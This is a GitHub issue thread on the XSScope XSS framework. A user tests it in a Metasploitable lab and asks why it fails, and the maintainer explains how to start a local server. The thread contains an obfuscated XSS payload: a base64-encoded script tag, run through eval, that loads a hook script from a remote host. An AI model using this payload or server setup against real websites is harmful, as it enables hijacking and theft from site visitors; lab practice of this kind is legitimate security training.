### ISSUE TITLE
injection issue

### ISSUE THREAD

**Issue by pretech86** [kleiton0x00/XSScope#9]
i inject this payload locally in metasploitable website with low security level 
<svg/onload=eval(atob('PHNjcmlwdCBzcmM9Imh0dHA6Ly8xOTIuMTY4LjguMTY4OjQwNDAveHNzY29wZS5qcyI+PC9zY3JpcHQ+'))>
and getthe following from the browser console , but nothing happened 

Injector: Started content script... links.js:4:11
Injector: Found 1 forms. links.js:12:32
Injector: Found 19 links. links.js:47:32
Injector: 4 look interesting. links.js:64:11
Injector: Started content script... links.js:4:11
Injector: Found 1 forms. links.js:12:32
Injector: Found 19 links. links.js:47:32
Injector: 4 look interesting.

**Comment by kleiton0x00** [comment]
If you want to use a Local Server (in your case 192.168.8.168:4040), you have to create your own HTTP Server. Since your port is 4040, open a new terminal and type (make sure to leave it always opened):

```python3 -m http.server 4040```

For more Information, please refer to our Wiki:  
https://github.com/kleiton0x00/XSScope/wiki/Server-setup
